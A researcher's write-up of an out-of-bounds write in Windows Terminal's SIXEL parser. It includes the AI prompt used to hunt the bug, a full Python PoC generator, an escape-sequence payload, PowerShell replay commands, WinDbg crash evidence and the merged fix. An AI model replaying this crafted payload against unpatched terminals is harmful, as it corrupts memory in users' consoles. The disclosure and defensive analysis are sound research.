Windows Terminal SIXEL: when a good prompt met a stubborn OOB write
This was not a clean "AI finds bug, vendor reproduces, patch lands" story. It was messier and more useful than that. A focused prompt helped me find a real out-of-bounds write in Windows Terminal's SIXEL parser. WinDbg convinced me it was a true positive long before the fix landed, but the report also showed where modern vulnerability triage gets hard: a small change in output chunking made the difference between a visible allocation exception and the later access violation I was seeing locally.
The bug was eventually fixed in Windows Terminal PR #20213, with the commit message saying exactly what mattered: "prevent allocating an absurd amount of memory or writing OOB." I am writing this down because the technical bug is only half the lesson. The other half is that prompt quality, repro detail, and patience now matter a lot more than a crash screenshot.
The prompt that helped
The useful prompt was not just "find bugs in Terminal." It constrained the model to a target, a bug class, and an evidence bar. That changed the work from broad code browsing into a repeatable security review loop.
We are doing authorized offensive security research in a controlled lab.
Focus on the Windows Terminal / OpenConsole source code.
Look for remotely reachable memory-safety issues triggered by crafted terminal content or files.
Prioritize integer overflows, OOB writes, and parser state bugs.
For each candidate:
- show the exact source path and function
- explain attacker control over the input
- build a minimal PoC payload
- require crash-dump evidence before calling it a true positive
- do not treat speculation as a finding
The important part is the last line. AI is very good at producing plausible vulnerability narratives. It is much less useful if you let it stop at "this looks risky." For this bug, the prompt forced the loop to end in a payload, a dump, a stack trace, and a bounds calculation.
The source-level smell
The first thing that looked suspicious was image-buffer sizing in SixelParser::_resizeImageBuffer().
The required size was computed using til::CoordType, which is a 32-bit coordinate type, and only then compared
against the vector size.
void SixelParser::_resizeImageBuffer(const til::CoordType requiredHeight)
{
    const auto requiredSize = (_imageCursor.y + requiredHeight) * _imageMaxWidth;
    if (static_cast<size_t>(requiredSize) > _imageBuffer.size())
    {
        static constexpr auto transparentPixel = IndexedPixel{ .transparent = true };
        _imageBuffer.resize(requiredSize, transparentPixel);
    }
}
Later, the write path derived a pointer from the same image geometry:
const auto targetOffset = _imageCursor.y * _imageMaxWidth + _imageCursor.x;
auto imageBufferPtr = reinterpret_cast<int16_t*>(_imageBuffer.data() + targetOffset);
That does not automatically prove a vulnerability. The real question was whether a terminal-controlled sequence could drive the parser into a state where the vector did not match the cursor geometry. The path that mattered was SIXEL display mode plus many SIXEL next-line commands.
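To make the size math concrete, here is a minimal Python sketch of what a 32-bit signed product does for a very wide image. It is a model, not the Terminal code: the 10-pixel cell width and the 6-pixel step per next-line command are assumptions for illustration, and signed overflow is formally undefined behavior in C++, so the two's-complement wrap modeled here is only what commonly happens on x64 builds.

```python
INT32_MAX = 2**31 - 1


def wrap_int32(value: int) -> int:
    """Reduce a Python int to the value a two's-complement int32 would hold."""
    value &= 0xFFFF_FFFF
    return value - 0x1_0000_0000 if value & 0x8000_0000 else value


def required_size_int32(cursor_y: int, required_height: int, image_max_width: int) -> int:
    """Model of (cursor.y + requiredHeight) * imageMaxWidth computed in int32."""
    return wrap_int32((cursor_y + required_height) * image_max_width)


def as_size_t(value: int) -> int:
    """Model of static_cast<size_t>(value) on a 64-bit target."""
    return value & 0xFFFF_FFFF_FFFF_FFFF


def first_wrapping_rows(image_max_width: int, sixel_height: int) -> int:
    """Smallest row total (a multiple of sixel_height) whose product exceeds INT32_MAX."""
    rows = sixel_height
    while rows * image_max_width <= INT32_MAX:
        rows += sixel_height
    return rows


# Assumptions for illustration only: 10 px per cell, 6 px per next-line step.
ASSUMED_CELL_WIDTH_PX = 10
ASSUMED_SIXEL_HEIGHT_PX = 6

width_px = 3276 * ASSUMED_CELL_WIDTH_PX
rows = first_wrapping_rows(width_px, ASSUMED_SIXEL_HEIGHT_PX)
wrapped = required_size_int32(rows - ASSUMED_SIXEL_HEIGHT_PX, ASSUMED_SIXEL_HEIGHT_PX, width_px)

print("rows at first wrap:", rows)
print("next-line commands needed:", rows // ASSUMED_SIXEL_HEIGHT_PX)
print("int32 result:", wrapped)
print("as size_t:", as_size_t(wrapped))
```

Under those assumptions the product goes negative after roughly eleven thousand next-line commands, and the cast to size_t turns it into an enormous resize request. That would be consistent with a resize that throws rather than one that silently succeeds, but the exact threshold depends on the real cell metrics.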
The payload shape
The reproducer was small. It requested a very wide terminal, enabled SIXEL display mode, started a SIXEL DCS sequence,
sent a large number of DECGNL next-line commands (-), and then ended the DCS.
ESC [ 8 ; 24 ; 3276 t
ESC [ ? 80 h
ESC P q
"-" repeated 12000 times
ESC \
python3.10 poc/sixel_integer_overflow_poc.py --lines 12000 --resize-cols 3276 --output payload.bin
The generator is intentionally small: it writes one resize request, enables SIXEL display mode, opens a SIXEL DCS,
emits many next-line commands, and then terminates the sequence. The standalone script is here:
sixel_integer_overflow_poc.py.
Full payload generator (Python)
#!/usr/bin/env python3
"""
Generate a crafted VT payload that drives the SIXEL parser's signed int32 size math.
This payload is intended for authorized lab testing only.
"""
from __future__ import annotations

import argparse
import sys


def _build_payload(lines: int, resize_cols: int, resize_rows: int) -> bytes:
    parts: list[bytes] = []
    # Optional: request a very wide terminal to reduce the number of SIXEL lines needed.
    if resize_cols > 0:
        parts.append(f"\x1b[8;{resize_rows};{resize_cols}t".encode("ascii"))
    # Enable SIXEL display mode (DECSDM).
    parts.append(b"\x1b[?80h")
    # Start SIXEL: DCS ... q
    parts.append(b"\x1bPq")
    # A run of DECGNL commands ('-') repeatedly moves the image cursor down and
    # triggers _resizeImageBuffer(_sixelHeight) each time.
    parts.append(b"-" * lines)
    # End DCS string.
    parts.append(b"\x1b\\")
    return b"".join(parts)


def main() -> int:
    parser = argparse.ArgumentParser(description="Generate a SIXEL integer-overflow stress payload.")
    parser.add_argument("--lines", type=int, default=200000, help="Number of SIXEL next-line commands ('-').")
    parser.add_argument(
        "--resize-cols",
        type=int,
        default=3276,
        help="Requested columns via CSI 8 ; rows ; cols t. Use 0 to skip resize request.",
    )
    parser.add_argument("--resize-rows", type=int, default=24, help="Rows used with --resize-cols.")
    parser.add_argument("--output", default="poc/sixel_integer_overflow_payload.bin", help="Output payload path.")
    parser.add_argument("--stdout", action="store_true", help="Write payload to stdout instead of --output.")
    args = parser.parse_args()

    if args.lines <= 0:
        parser.error("--lines must be > 0")
    if args.resize_cols < 0 or args.resize_rows <= 0:
        parser.error("resize values must be positive (or cols=0 to disable resize request)")

    payload = _build_payload(args.lines, args.resize_cols, args.resize_rows)

    if args.stdout:
        sys.stdout.buffer.write(payload)
        return 0

    with open(args.output, "wb") as f:
        f.write(payload)

    print(f"[+] Wrote {len(payload)} bytes to {args.output}")
    print("[*] Replay examples (raw byte output):")
    print("  PowerShell:")
    print(
        "    $b=[IO.File]::ReadAllBytes('"
        + args.output
        + "');$s=[Console]::OpenStandardOutput();$s.Write($b,0,$b.Length);$s.Flush()"
    )
    print("  Python:")
    print(f"    python -c \"import sys;sys.stdout.buffer.write(open(r'{args.output}','rb').read())\"")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
The raw-byte replay detail mattered. The path was sensitive to how the terminal received chunks of the sequence.
$b=[IO.File]::ReadAllBytes("$env:USERPROFILE\Desktop\payload.bin")
$s=[Console]::OpenStandardOutput()
$s.Write($b,0,$b.Length)
$s.Flush()
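Because chunking turned out to matter, it can help to make the write size an explicit knob when replaying the payload. The sketch below is a hypothetical helper, not part of the original PoC: replay_in_chunks and its chunk_size parameter are names introduced here for illustration. It only controls how the writer splits the bytes; the shell, the pipe, and the console host may still merge or split writes before the parser sees them.

```python
import io
from typing import BinaryIO


def replay_in_chunks(payload: bytes, chunk_size: int, out: BinaryIO) -> int:
    """Write payload to out in fixed-size pieces, flushing after each one.

    Returns the number of write calls made. Hypothetical helper for lab replay.
    """
    if chunk_size <= 0:
        raise ValueError("chunk_size must be > 0")
    writes = 0
    for start in range(0, len(payload), chunk_size):
        out.write(payload[start:start + chunk_size])
        out.flush()  # push each piece out separately instead of batching
        writes += 1
    return writes


# Small self-check against an in-memory stream: the bytes must arrive unchanged.
demo_payload = b"\x1bPq" + b"-" * 10 + b"\x1b\\"
demo_stream = io.BytesIO()
demo_writes = replay_in_chunks(demo_payload, 4, demo_stream)
```

For a real replay, pass sys.stdout.buffer as the stream and the bytes of payload.bin as the payload, then vary chunk_size between runs and record which values end in an exception and which end in the access violation.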
The crash proof
On OpenConsole.exe 1.23.2601.21001 from Windows Terminal v1.23.20211.0, the final
crash was a write access violation in the SIXEL parser. The dump showed the write target past the vector end.
Failure.Bucket:
INVALID_POINTER_WRITE_c0000005_OpenConsole.exe!Microsoft::Console::VirtualTerminal::SixelParser::_parseCommandChar
Faulting instruction:
mov word ptr [rdx],cx
_Myend : 0x000001e3`cbc71d40
rdx : 0x000001e3`cbc802d2
rdx - _Myend = 58770 (0xE592)
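The bounds arithmetic from the dump is easy to recheck by hand. This short Python sketch uses only the two addresses quoted above; the function name is introduced here for illustration.

```python
# Values copied from the WinDbg output above.
MYEND = 0x000001E3_CBC71D40  # end pointer of the vector's storage (_Myend)
RDX = 0x000001E3_CBC802D2    # destination of "mov word ptr [rdx],cx"


def bytes_past_end(write_addr: int, vector_end: int) -> int:
    """Distance from the vector end to the write target; positive means out of bounds."""
    return write_addr - vector_end


overshoot = bytes_past_end(RDX, MYEND)
print(overshoot, hex(overshoot))
```

A positive result means the two-byte store lands beyond the vector's end pointer rather than inside its storage.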
One detail later became important: my ProcDump output also showed a first-chance std::bad_alloc before the
final access violation. That meant the allocation failure path existed in my repro too; it just was not the end of the story.
Where triage got stuck
MSRC tried to reproduce the issue more than once and could not get the same access violation. Their path usually stopped at
std::vector throwing bad_alloc or length_error during resize. From their point of view,
the exception appeared to prevent the AV.
That is a fair triage problem. When bug bounty programs receive more AI-assisted reports, they will see more reports that are close to real bugs but missing one small precondition. In this case, the missing precondition was not a magic registry setting. It was output chunking. PowerShell 5 and PowerShell 7 did not behave the same way for this payload.
One stopped at vector too long, while another reached the later OOB write.
The GitHub turn
Before GitHub, I had already tried MSRC twice. The first case was created on January 30, 2026. The second case was created
on February 24, 2026 with better crash evidence and was last modified on March 26, 2026. Both ended as complete/closed, with
the conclusion that the issue could not be reproduced. From their side, they were usually stopping at a safe-looking
vector too long exception.
From my side, the WinDbg evidence was hard to ignore. The register state and vector bounds showed an actual write past
_Myend, not just a generic crash. That made me want to understand whether I had a false positive, whether the
report was missing a precondition, or whether the triage path was simply exercising a different chunking behavior. So I opened
GitHub issue #20149
with the source-level concern, the payload shape, the dump evidence, and the exact WinDbg bounds proof.
That public thread made the missing context visible. The maintainers tested different shells, narrowed the behavior to chunking, and connected the bad allocation path to the later parser-state problem.
- ... 108187 and the report title "OpenConsole SIXEL parser out-of-bounds write via crafted..."
- ... vector too long, then identified PowerShell/version chunking as the missing behavior.
- ... main as c829d4ca5 and closed the issue.
- ... 1.24 and 1.25 servicing pipelines with backport commits referenced from the issue.
The fix
The merged fix has two parts. First, SIXEL character processing is wrapped in a catch-all. If parsing throws, the handler
returns false, which tells the state machine to ignore the rest of the DCS content.
return [&](const auto ch) {
    try
    {
        _parseCommandChar(ch);
    }
    catch (...)
    {
        // Ignore all further content.
        return false;
    }
    return true;
};
Second, _executeNextLine() stops growing the hidden image once there is no visible pixel height left. In SIXEL
display mode, the image should not keep extending beyond the bottom of the display if the extra rows will never render.
if (_availablePixelHeight > 0)
{
    _imageCursor.y += _sixelHeight;
    _availablePixelHeight -= _sixelHeight;
    _resizeImageBuffer(_sixelHeight);
    _fillImageBackgroundWhenScrolled();
}
It is worth noting what the fix did not do: it did not rewrite _resizeImageBuffer() into fully overflow-safe
arithmetic. The fix instead removes the dangerous growth path for this bug and prevents exception recovery from continuing
inside a stale SIXEL transaction.
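A toy model can show why stopping after the first exception matters, and why chunking could change the outcome. The Python sketch below is not the Windows Terminal implementation: ToySixelParser, feed, the max_cells limit, and the use of "~" as a stand-in pixel write are all hypothetical. It only assumes the ordering visible in the snippet above (the cursor moves before the buffer grows) and an exception that is swallowed once per chunk.

```python
class ToySixelParser:
    """Toy model only: tracks a cursor row and an allocated cell count."""

    def __init__(self, width: int, sixel_height: int, max_cells: int) -> None:
        self.width = width
        self.sixel_height = sixel_height
        self.max_cells = max_cells  # stand-in for the point where resize throws
        self.cursor_y = 0
        self.buffer_cells = width * sixel_height
        self.oob_writes = 0

    def parse_char(self, ch: str) -> None:
        if ch == "-":
            # The cursor advances first, then the buffer tries to grow.
            self.cursor_y += self.sixel_height
            required = (self.cursor_y + self.sixel_height) * self.width
            if required > self.max_cells:
                raise MemoryError("vector too long")
            self.buffer_cells = max(self.buffer_cells, required)
        else:
            # Any other character stands in for a pixel write at the cursor row.
            if self.cursor_y * self.width >= self.buffer_cells:
                self.oob_writes += 1


def feed(parser: ToySixelParser, chunks: list[str], ignore_rest_on_error: bool) -> int:
    """Feed chunks one at a time; return how many writes landed out of bounds."""
    ignoring = False
    for chunk in chunks:
        if ignoring:
            continue  # models the handler returning false for the rest of the DCS
        try:
            for ch in chunk:
                parser.parse_char(ch)
        except MemoryError:
            # The exception ends this chunk. Without the fix, the next chunk
            # resumes on a cursor that is ahead of the buffer.
            ignoring = ignore_rest_on_error
    return parser.oob_writes


single_chunk = feed(ToySixelParser(10, 6, 200), ["---~"], ignore_rest_on_error=False)
split_chunks = feed(ToySixelParser(10, 6, 200), ["---", "~"], ignore_rest_on_error=False)
split_fixed = feed(ToySixelParser(10, 6, 200), ["---", "~"], ignore_rest_on_error=True)
print(single_chunk, split_chunks, split_fixed)
```

In this model, a single chunk ends at the exception and never reaches the write, a split delivery reaches the write with a stale cursor, and the ignore-the-rest behavior removes the stale write in the split case. The real parser has more state than this, so treat it as an illustration of the failure shape rather than a reproduction.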
The bigger lesson
I do think AI will increase the volume of this class of finding. Models are getting good at noticing memory-safety patterns: size math, parser state, allocator failure paths, and "this vector must have grown before this write" assumptions.
But that does not mean every AI-assisted report is ready for a bounty queue. The responsibility on the researcher is higher, not lower. If a finding depends on output chunking, shell version, terminal mode, or an exception being swallowed between transactions, the report needs to say so. I missed that part at first. The dump was real, but the repro was not complete enough.
In the end, the effective part was not "AI found a bug." It was the loop: constrain the model, force a PoC, capture the dump, ask why triage sees something different, and keep reducing the mismatch until the bug becomes obvious to someone else too.
Thanks to the Windows Terminal maintainers for digging into the chunking behavior and landing the fix. This post is written from the researcher's side of the timeline; the useful outcome is that the bug is now fixed.